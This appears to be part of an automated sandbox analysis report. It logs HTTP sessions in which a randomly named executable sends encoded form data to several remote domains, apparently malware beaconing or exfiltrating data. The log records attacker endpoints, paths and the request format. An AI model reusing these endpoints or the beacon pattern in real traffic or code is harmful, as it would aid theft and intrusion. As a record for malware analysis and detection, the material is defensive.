                                                                            Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e
                                                                            Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/
                                                                            Mar 28, 2025 14:35:00.698111057 CET625INData Raw: 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51
                                                                            Data Ascii: U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);.
                                                                            Mar 28, 2025 14:35:00.698133945 CET5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.2249169104.21.94.162801224C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 28, 2025 14:35:03.073936939 CET2062OUTPOST /awht/ HTTP/1.1
                                                                            Host: www.viatotor.cfd
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Content-Length: 3627
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.viatotor.cfd
                                                                            Referer: http://www.viatotor.cfd/awht/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                                                                            Data Raw: 55 70 35 44 78 64 3d 78 55 2b 6e 42 50 51 6b 35 67 43 62 4f 41 4a 35 38 41 55 36 36 44 75 54 66 62 31 66 47 42 43 38 34 78 38 46 58 31 48 59 35 71 44 72 64 71 7a 38 38 42 67 41 6e 4b 41 44 69 4a 7a 71 59 61 43 6f 62 4b 6a 2f 36 56 73 61 4c 45 30 34 54 67 6b 70 76 53 41 58 45 73 30 76 4f 36 6c 32 42 48 43 35 71 2b 53 64 74 4a 76 33 50 39 53 46 2b 6e 4c 73 6d 79 49 6c 52 4d 63 6d 38 2b 30 51 75 4a 70 65 47 67 6c 78 2f 66 46 69 53 36 6c 71 6d 68 44 32 49 7a 46 71 6c 50 76 77 35 6b 76 58 72 5a 36 37 65 66 50 38 61 49 2b 6c 74 37 68 62 62 59 66 47 78 66 79 32 79 48 68 66 38 50 72 4f 77 55 41 47 33 32 30 6f 48 51 63 35 58 4d 33 47 30 53 56 42 4c 2b 67 77 4a 31 38 33 43 58 63 4a 4d 41 74 6b 58 4e 59 65 4b 77 57 57 6a 62 68 4f 52 79 4a 51 78 77 6d 6d 77 52 38 76 4f 72 31 71 72 66 74 38 35 79 42 76 52 56 55 37 4e 44 67 4b 30 77 34 79 62 77 51 65 77 44 54 41 65 42 55 6f 72 43 66 50 59 63 48 56 4b 6e 56 7a 32 70 41 75 68 72 6e 54 49 61 51 5a 63 6f 63 76 4f 51 50 53 32 2f 7a 56 46 63 67 36 56 56 4e 44 38 2b 4f [TRUNCATED]
                                                                            Data Ascii: Up5Dxd=xU+nBPQk5gCbOAJ58AU66DuTfb1fGBC84x8FX1HY5qDrdqz88BgAnKADiJzqYaCobKj/6VsaLE04TgkpvSAXEs0vO6l2BHC5q+SdtJv3P9SF+nLsmyIlRMcm8+0QuJpeGglx/fFiS6lqmhD2IzFqlPvw5kvXrZ67efP8aI+lt7hbbYfGxfy2yHhf8PrOwUAG320oHQc5XM3G0SVBL+gwJ183CXcJMAtkXNYeKwWWjbhORyJQxwmmwR8vOr1qrft85yBvRVU7NDgK0w4ybwQewDTAeBUorCfPYcHVKnVz2pAuhrnTIaQZcocvOQPS2/zVFcg6VVND8+Og+s+CsbSeLwfClPzml0cuAkgs+CCXg1jhqq5DAoBicnFT8rdN+L9Cl2EnAT2tXlbpxJfFRD+8xDtI6KfvBTUA54TU9JHqe6fCumOE29h+ui37rRhBVcuVEzh/YJnCzzOaHAx0zr9l4pG4rXmM0dhOfiho56J/e2UeJu2QhdwVgmiXOhLmEwAZ//GyJfBVqs4ZaFFxZnVvHr7tKh/JWJz4NVMzi8RvHxiPmrhv+YOKx10NucBRYd+kvbjTBEDWFdo+/PNS+dFoSpg/J55pfa+9foEyDcjBAfQt9BQtSLR4xmdcChLxHkg6vGAWJ0jdYzXdXX07WtXh3mW8RR13vgc4+eZiWiuXBAIivVuoYPmJgdgLb8VxB5WlkrrbF9XUiwjKcM6Q/yto8AMq+9ty0ee9Vl+KBxOoRT3RSMxFkjXDBqf3cONfsKhikNpTmxJGwDu91byrCTNyO8118Mz4jDBWCrLq+vblMEEyAtr3sYJvSNUxNyVb6gsKGIsZ3hmKzTYwVeSMLgPCMzQMneJXWajL2pbVf4V/ClOVrSH+Ti4Jfn1K/Y3QHPs484Nx2YqhrRs9xaDE6HbBDyNXYPzER0fFmHAaeRHzuMeKRLZguhHR5cBHfM33Sr+lxkORukvwIcqiNq7OE2BXh6h9pv2tDCZz/lN4DCOXmekjD [TRUNCATED]
                                                                            Mar 28, 2025 14:35:03.163808107 CET2179OUTData Raw: 68 39 65 75 71 70 77 37 51 61 44 70 7a 35 4f 36 63 55 6c 65 44 31 4d 74 64 47 7a 33 36 68 2b 6c 54 45 38 4e 6f 76 4d 4a 33 35 56 6e 79 41 73 41 6b 6e 37 62 5a 4b 64 66 70 34 55 4d 6d 47 58 36 31 72 35 63 34 4b 70 7a 36 47 53 6f 61 57 49 66 38 30
                                                                            Data Ascii: h9euqpw7QaDpz5O6cUleD1MtdGz36h+lTE8NovMJ35VnyAsAkn7bZKdfp4UMmGX61r5c4Kpz6GSoaWIf80fcdS87Z1ZryeBpFDFZ6BP09wTqp371XvYMXtWgumcaoWPZkQI7IngTCEAQBuYMU+DZEGaxIU3zue06zCu4fCPS1A7tDONVCh5OJ8OAxpHtFbTeVhHLy1lHMmt9obFGT/2dsmkHZKqHhlGLkHwp+/5U93LKZ5UFYGb
                                                                            Mar 28, 2025 14:35:04.440785885 CET938INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 28 Mar 2025 13:35:04 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            x-turbo-charged-by: LiteSpeed
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bVG2cloS8Wf2MCWYv0%2FOy2jcBoRcolgBG%2FEQLETpnrWfXDhwCRLaoQUhHsJa8TFspljcCi4f0Ks%2FxGskFf4AkLeprpkVK0opvIKmOEGScRk8UJUufrN5BbVuCKk7kZOrz%2FNj"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 9277822c8ab4e226-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=89732&min_rtt=89732&rtt_var=44866&sent=4&recv=7&lost=0&retrans=0&sent_bytes=0&recv_bytes=4241&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                            Data Ascii: f
                                                                            Mar 28, 2025 14:35:04.440831900 CET714INData Raw: 32 63 33 0d 0a 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07
                                                                            Data Ascii: 2c3dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhy
                                                                            Mar 28, 2025 14:35:04.440839052 CET21INData Raw: 62 0d 0a e3 02 00 bb 14 ce 65 e3 04 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: be0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.2249170104.21.94.162801224C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 28, 2025 14:35:05.704433918 CET555OUTGET /awht/?Up5Dxd=8WWHC7wWqzabLylEqC4h4xSUa5Q1ERPluRInRnvP6aHLJY6FsD1in5Ba6ce0RJeZH7zN6VIqS0duX3wRoykHaMJocpJ8Lyik8tyRvKfKAYeOrifkhUVyVr4B9LR1&RtRt=H2TxDP-0yx HTTP/1.1
                                                                            Host: www.viatotor.cfd
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                                                                            Mar 28, 2025 14:35:06.169384003 CET1031INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 28 Mar 2025 13:35:06 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            x-turbo-charged-by: LiteSpeed
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xWmrW3qd%2Fuo90CZd6dtPY5BGkvfcTm%2B5LLdkKT1PS2eDmxB%2BrogMlk3TnEB8J6q2czJ%2B%2FcG5DCAltnNsCkhablQJpoum2nsFvnXqGlVL%2BHsw4eAhSltA5bdksMv0At2BbGPe"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 9277823cf9d1f78f-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=89267&min_rtt=89267&rtt_var=44633&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=555&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 34 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66
                                                                            Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-f
                                                                            Mar 28, 2025 14:35:06.169429064 CET1031INData Raw: 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29
                                                                            Data Ascii: it=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; backg
                                                                            Mar 28, 2025 14:35:06.169473886 CET93INData Raw: 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79
                                                                            Data Ascii: pany and, as such, has no control over content found on this site.</p></div></body></html>
                                                                            Mar 28, 2025 14:35:06.169497013 CET5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.224917176.223.54.146801224C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 28, 2025 14:35:11.432322025 CET2062OUTPOST /tskx/ HTTP/1.1
                                                                            Host: www.ambitiouswomen.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Content-Length: 2163
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.ambitiouswomen.net
                                                                            Referer: http://www.ambitiouswomen.net/tskx/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                                                                            Data Raw: 55 70 35 44 78 64 3d 36 48 78 4d 78 74 5a 4d 56 6f 2b 53 5a 54 54 5a 58 6c 61 31 57 34 61 36 5a 6a 58 39 6c 79 7a 72 48 70 43 52 41 6d 56 79 51 5a 2b 6b 6d 6e 7a 39 58 32 61 59 55 62 6f 56 39 30 42 57 37 67 57 49 54 67 66 70 61 58 6f 58 54 2b 64 65 61 75 55 2b 6e 6d 51 4b 48 68 76 31 4a 7a 56 6f 36 73 59 4d 4f 6c 33 6a 4d 45 50 7a 55 67 65 51 73 4f 52 44 33 41 41 31 54 30 48 54 42 56 43 43 31 67 6f 73 51 30 4f 2f 73 4c 53 51 57 71 46 47 59 34 67 57 6b 6e 43 72 37 59 44 50 53 73 49 41 77 4a 65 4b 74 6a 51 4f 6f 69 72 57 33 43 53 46 67 77 30 51 46 72 77 63 38 54 6c 4f 2f 76 38 31 72 6f 61 77 32 39 66 2b 50 33 4c 31 79 55 41 62 63 41 71 30 56 4a 54 67 69 42 79 78 33 68 32 4d 4d 51 6a 55 2b 78 65 52 67 78 47 6b 51 63 62 4f 41 4a 6e 59 37 52 33 6a 71 68 68 44 65 39 50 74 33 69 4d 4b 30 51 70 72 67 58 6a 38 6e 61 4f 50 5a 4a 77 75 41 70 7a 64 5a 43 30 72 78 4d 34 79 75 34 59 65 6f 4d 74 62 51 6e 31 55 2f 4d 33 31 46 6f 6a 43 56 78 37 4c 34 6b 52 65 49 64 41 36 61 6e 4e 56 36 79 78 64 42 45 79 4a 69 61 6f [TRUNCATED]
                                                                            Data Ascii: Up5Dxd=6HxMxtZMVo+SZTTZXla1W4a6ZjX9lyzrHpCRAmVyQZ+kmnz9X2aYUboV90BW7gWITgfpaXoXT+deauU+nmQKHhv1JzVo6sYMOl3jMEPzUgeQsORD3AA1T0HTBVCC1gosQ0O/sLSQWqFGY4gWknCr7YDPSsIAwJeKtjQOoirW3CSFgw0QFrwc8TlO/v81roaw29f+P3L1yUAbcAq0VJTgiByx3h2MMQjU+xeRgxGkQcbOAJnY7R3jqhhDe9Pt3iMK0QprgXj8naOPZJwuApzdZC0rxM4yu4YeoMtbQn1U/M31FojCVx7L4kReIdA6anNV6yxdBEyJiaobR9MfCZjVIu5FefLLXr31GqtmPA4XyTfTviO8HWlBst19El4dyFEM+pn3FrqPqnlLcHeGdeICCfhWOZjQkqqPEsXNvrFbS9ePMWlbyO8fa2CXWlYdjXrAhd3TILZyvRGNVYREoQJ9K3UX21E4Vhr9IKaQpLi0wGR1nPKFaa1WNFVLmJlWRnOXHnfxDWg6KW/1QNKkx4VFgEUGIxUhCbqWncDtgm4nJuIJuOKpOT8D/Xobg414PFYj2OvHB3LUlccXDL8fd25RyXAaryIKEUBtLQwVFiCdeXzcmKj1nSG504cmyy32F9VaAf/1tw5AIpv7FjL0VVuRzXefuODh46rVBzDWzUNpolfK5zcUFBmCY22QWsohrxqR52cMCAFufNBbCCzjkdNqY5/P1z+m5Rxu2OO+uy3lHGEwr/r4oHBlIJSiwHENJaNYmBeAXWLmA/8mHQ8Zj+lS98SDAfy54mKVSaXf/N84hdaz8ru1jQTxOR2pIAMSqQRjNPpIXz/hQZYSs6l8TLyP/S6Wpv2IEgZAS35tA8V2McbtKvM12Zgq0bNS3/Q3EYZm4jA9ixKfUablwa/u7aATdRCzigQyJG6z/mo+4jlzPRCSkyBIqcoCQdapqrXvfuKbyCj3oUOgouPxQOXSidUTV8fY4TTQEOG6a5Fm68bMcC4lm [TRUNCATED]
                                                                            Mar 28, 2025 14:35:11.531265020 CET733OUTData Raw: 52 58 72 56 62 7a 73 54 44 66 31 69 78 66 70 71 2f 34 59 71 51 4b 4c 55 62 52 78 63 77 56 67 56 4e 6f 72 6a 42 63 63 51 5a 45 7a 51 34 78 55 63 78 66 49 59 71 55 43 75 6f 55 62 68 51 74 71 4f 75 2b 4e 55 34 6c 31 71 32 37 2b 33 69 31 44 68 62 38
                                                                            Data Ascii: RXrVbzsTDf1ixfpq/4YqQKLUbRxcwVgVNorjBccQZEzQ4xUcxfIYqUCuoUbhQtqOu+NU4l1q27+3i1Dhb8cY7i6cnuLngyvDu64Mqj1WdTeAIBqvL0zMxzhw5ydKG65eUbtD5axkHToFOMpRFDwD64d+k8D6th2m72Ii3THtMHw3qflqCif+hDIojMr3rNXx85+6qRMBMiyeKMOhjQUYzXm88U+5Ceb/cQU9xfLN2l1pKAvNMkC
                                                                            Mar 28, 2025 14:35:11.531436920 CET73INHTTP/1.1 405 Method Not Allowed
                                                                            content-length: 0
                                                                            connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.2.224917276.223.54.146801224C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 28, 2025 14:35:14.112714052 CET834OUTPOST /tskx/ HTTP/1.1
                                                                            Host: www.ambitiouswomen.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Content-Length: 203
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.ambitiouswomen.net
                                                                            Referer: http://www.ambitiouswomen.net/tskx/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                                                                            Data Raw: 55 70 35 44 78 64 3d 36 48 78 4d 78 74 5a 4d 56 6f 2b 53 5a 55 6e 5a 58 33 2b 31 57 59 61 36 4d 6a 58 39 73 53 7a 79 48 70 47 6e 41 6c 5a 69 51 4f 61 6b 6d 33 6a 39 51 44 47 59 42 62 6f 53 31 55 42 53 6d 51 57 52 54 67 66 66 61 56 4d 58 54 36 31 65 62 4c 51 2b 32 33 51 4a 46 52 76 33 50 7a 56 6c 36 73 55 42 4f 6c 79 2b 4d 45 33 7a 55 6d 32 51 71 2b 42 44 78 69 59 31 56 45 48 5a 57 6c 43 76 31 67 55 35 51 30 65 6e 73 4c 2b 51 57 34 39 47 59 70 41 57 67 30 71 72 69 49 44 30 49 38 4a 42 38 4c 7a 6f 72 68 6b 54 73 7a 54 6e 31 51 6d 37 68 58 56 57 41 5a 77 56 31 6d 39 79 30 71 74 45 6e 4d 44 62 70 67 3d 3d
                                                                            Data Ascii: Up5Dxd=6HxMxtZMVo+SZUnZX3+1WYa6MjX9sSzyHpGnAlZiQOakm3j9QDGYBboS1UBSmQWRTgffaVMXT61ebLQ+23QJFRv3PzVl6sUBOly+ME3zUm2Qq+BDxiY1VEHZWlCv1gU5Q0ensL+QW49GYpAWg0qriID0I8JB8LzorhkTszTn1Qm7hXVWAZwV1m9y0qtEnMDbpg==
                                                                            Mar 28, 2025 14:35:14.210309029 CET73INHTTP/1.1 405 Method Not Allowed
                                                                            content-length: 0
                                                                            connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.224917376.223.54.146801224C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 28, 2025 14:35:16.752345085 CET2062OUTPOST /tskx/ HTTP/1.1
                                                                            Host: www.ambitiouswomen.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Content-Length: 3627
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.ambitiouswomen.net
                                                                            Referer: http://www.ambitiouswomen.net/tskx/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                                                                            Data Raw: 55 70 35 44 78 64 3d 36 48 78 4d 78 74 5a 4d 56 6f 2b 53 44 30 58 5a 55 57 2b 31 54 34 61 35 56 44 58 39 6c 79 7a 70 48 70 43 6e 41 6d 56 79 51 62 4b 6b 6d 68 2f 39 58 6d 61 59 47 72 6f 53 7a 55 42 57 37 67 57 4c 54 6b 2f 35 61 58 55 74 54 38 56 65 61 71 41 2b 6e 6c 49 4b 4b 78 76 31 45 54 56 71 36 73 55 75 4f 68 58 33 4d 48 62 4a 55 6d 4f 51 71 6f 56 44 77 53 59 32 5a 6b 48 5a 57 6c 43 6a 31 67 55 5a 51 30 48 36 73 4b 33 50 57 72 6c 47 5a 49 67 57 69 58 43 6b 6b 49 44 77 57 73 49 53 77 4a 53 65 74 6a 51 4b 6f 69 50 77 33 43 65 46 68 6d 6f 51 46 6f 6f 66 69 54 6c 4a 37 76 38 31 6f 59 61 2b 32 39 66 69 50 33 4c 31 79 55 4d 62 64 51 71 30 56 49 54 2f 73 68 79 78 2f 42 33 4d 44 77 66 59 2b 78 4c 77 67 78 57 53 51 4c 44 4f 44 50 7a 59 38 68 33 6a 2b 42 67 47 65 39 4f 76 73 53 4d 6f 30 51 78 64 67 54 4f 6e 6e 61 4f 50 5a 4f 59 75 57 72 72 64 51 79 30 72 34 73 34 7a 34 49 59 66 6f 4d 5a 6c 51 6d 78 55 2f 4f 48 31 45 59 54 43 58 7a 54 45 33 30 52 64 46 39 41 30 4d 58 4e 36 36 79 39 6e 42 45 37 73 69 59 38 [TRUNCATED]
                                                                            Data Ascii: Up5Dxd=6HxMxtZMVo+SD0XZUW+1T4a5VDX9lyzpHpCnAmVyQbKkmh/9XmaYGroSzUBW7gWLTk/5aXUtT8VeaqA+nlIKKxv1ETVq6sUuOhX3MHbJUmOQqoVDwSY2ZkHZWlCj1gUZQ0H6sK3PWrlGZIgWiXCkkIDwWsISwJSetjQKoiPw3CeFhmoQFoofiTlJ7v81oYa+29fiP3L1yUMbdQq0VIT/shyx/B3MDwfY+xLwgxWSQLDODPzY8h3j+BgGe9OvsSMo0QxdgTOnnaOPZOYuWrrdQy0r4s4z4IYfoMZlQmxU/OH1EYTCXzTE30RdF9A0MXN66y9nBE7siY8bR+kfA9/VIe5CX/KAA6LpGqlIPA1gyRLTgTO8GVBCpd00S14D4lF3+prVFrKPqzRLOW+GX58dKPhbF5jLtKrWEo3vvp8DRMuPNmlb0sUcWGCWbFZe0Hrehd3tIJAQvguNVctEoDx9K3UU9VEEbBXPIKmcpPKkwDd1neaFab1WSFVLrpldYHOdHj2EDS5HKGr1Quikq6NFxUUEOxUsdLr6ncTtgncNJuQJpvKpO3oD23of+o1nPFZS2OiIBzXEle4XDIkff35R83AbsCIOVkATLQ4FFiP4eSPcnqD1mny51Ycowy32PdV4AfXPtxEiIt77FSb0Q1uS63eYoODiu6rHBzTWzUBpohbK4EwUCy+CUm2ScMo7gRmx52NzCE1AfIRbCTzjjbZpSp/Wwz/nyxxW2OOyuwGiE2kwyPL4qmBkHJSh+nFSNaNkmBumXW/MAIkmHTkZgLxS9MSDAfy64mKRSaTx/NsWhdazuP61im/xWh3tVQM/uQRHNPtUX3rPQZkStot8TLyMyC6XjP2PEgV3S35DA8p2Q8ztL5Y117Iqw7NSy/Q2N4Zj4jBliwGPUbblyp3uyIoUBxCy2QQaQW2s/mU24hpzPgySlhZIqsoCOtaoiLX6buGHyC/JoRT4offxR/HSkaAQTMfZ1zTeEOLEa5d+68j2cBIlj [TRUNCATED]
                                                                            Mar 28, 2025 14:35:16.849092960 CET73INHTTP/1.1 405 Method Not Allowed
                                                                            content-length: 0
                                                                            connection: close
                                                                            Mar 28, 2025 14:35:16.849195004 CET2062OUTData Raw: 52 61 75 35 63 6b 38 54 41 51 6c 69 6a 57 4a 6d 76 34 59 47 2b 4b 4b 63 4c 52 41 73 77 55 30 42 4e 2b 4c 6a 42 64 4d 51 5a 45 7a 51 34 6d 6b 63 74 66 49 5a 74 55 43 61 34 55 74 6c 51 74 70 47 75 76 65 38 34 6b 6c 72 38 77 65 33 30 31 44 6b 32 38
                                                                            Data Ascii: Rau5ck8TAQlijWJmv4YG+KKcLRAswU0BN+LjBdMQZEzQ4mkctfIZtUCa4UtlQtpGuve84klr8we301Dk28cM7i6QJu4bgz/juzJMqrVWcReBiKKj50ypAzgQ5zoKG862ULa35fxkCLYFMMpdTDwCZ4d+k8y6thFe74Yi3VntwDw20flmhif+HDIgjMbzrO2R84dTYV8BNmyenbeh7QUQzXjIGU6ZCeZHcQRhxbbN2wFpVLPMvkC
                                                                            Mar 28, 2025 14:35:16.890944958 CET135OUTData Raw: 6a 55 37 30 62 35 6f 6c 30 7a 54 31 6c 73 65 70 7a 4d 57 42 79 51 73 70 4d 42 36 32 4c 65 76 2b 2b 57 44 5a 52 72 58 33 32 4b 6a 36 77 69 71 66 33 4f 2f 6b 32 72 57 6d 43 31 5a 49 2b 79 46 6a 63 63 47 35 39 55 65 57 64 69 6c 4e 65 59 2b 77 4b 36
                                                                            Data Ascii: jU70b5ol0zT1lsepzMWByQspMB62Lev++WDZRrX32Kj6wiqf3O/k2rWmC1ZI+yFjccG59UeWdilNeY+wK6P8uIKZUmQfxlmj126edx6DiNx8SWQfFPUWV3FfEOrR4BwyzOqCA==


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.224917476.223.54.146801224C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 28, 2025 14:35:28.454426050 CET561OUTGET /tskx/?Up5Dxd=3FZsyYtvHJrwTHHvKE69JLGDZnzKmCnrMuqRAlJnKL7t2F6wJjOvapVJjCl/gRiWQVTLflE3WPZwa5xfwkUpPmC6JxN15cgxThe6GU7HJW2U+NF71xQUQBXCRD3d&RtRt=H2TxDP-0yx HTTP/1.1
                                                                            Host: www.ambitiouswomen.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
